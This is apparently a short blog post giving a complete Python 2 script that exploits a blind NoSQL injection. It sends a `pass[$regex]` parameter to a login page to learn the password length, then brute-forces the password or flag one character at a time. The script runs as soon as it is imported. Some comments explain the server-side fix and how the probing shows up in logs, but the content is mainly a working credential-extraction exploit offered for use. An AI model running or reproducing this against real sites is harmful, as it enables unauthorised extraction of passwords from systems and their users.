NoSQL blind injection script!

Here is a little script to exploit NoSQL blind injections.

#!/usr/bin/env python2
import urllib2
import time
def checkIfGood(param):
    """Send one probe request and report whether the failure marker came back.

    `param` is appended to the query string as the value of `pass[$regex]`.
    PHP turns that bracketed key into an array, so an application that hands
    request parameters straight to its NoSQL query treats the value as a
    regex operator instead of a literal password (the backend is presumably
    MongoDB; the page does not name it).  The server-side fix is to require
    `pass` to be a scalar string and to reject array input or keys starting
    with `$` before building the query.

    Returns 0 when the page does not contain "This is not a valid flag",
    and 1 when it does.
    """
    probe_url = "http://www.vulnerable-site.com/index.php?name=user&pass[$regex]=" + param
    body = urllib2.urlopen(probe_url).read()
    print "[^]Trying " + param
    # One request per guess with a short pause: in access logs this shows up
    # as a steady run of hits whose query string carries `[$regex]`.
    time.sleep(0.1)
    if "This is not a valid flag" in body:
        return (1)
    return (0)
# Candidate characters, tried in this order by main(): digits, then lowercase
# and uppercase letters in AZERTY keyboard order, then "@", "-", "_" and ".".
CHARSET = "0123456789azertyuiopqsdfghjklmwxcvbnAZERTYUIOPQSDFGHJKLMWXCVBN@-_."
def main():
    """Extend a known prefix one character at a time using checkIfGood().

    Each probe is the current prefix plus one candidate from CHARSET,
    followed by `.{N}` where N pads the pattern out to 21 characters.
    A 0 from checkIfGood() keeps the candidate and restarts the scan of
    CHARSET; a 1 discards it and moves to the next candidate.  The loop
    ends once every candidate has been rejected for the current prefix.
    Nothing is returned; the only output is what checkIfGood() prints.
    """
    known = ""
    pos = 0
    while pos < len(CHARSET):
        guess = known + CHARSET[pos]
        # 21 is the hard-coded total length (the original comment ties it to
        # the figure obtained from check_nb_chars()).
        pattern = guess + '.' + '{' + str(21 - len(guess)) + '}'
        if checkIfGood(pattern) == 1:
            pos += 1
        else:
            known = guess
            pos = 0
def check_nb_chars():
    """Probe `.{n}` for n from 0 to 99 and print each n that checkIfGood() accepts.

    A length is reported with "OK : n" whenever checkIfGood() returns 0.
    All 100 probes are always sent; the loop does not stop at the first hit.
    """
    for length in range(100):
        if checkIfGood(".{" + str(length) + "}") == 0:
            print "OK : " + str(length)
# Length-discovery pass, left commented out by the author; main() relies on
# the hard-coded length 21 instead.
#check_nb_chars()
# Called unconditionally at module level, so the requests start as soon as the
# file is executed or imported.
main()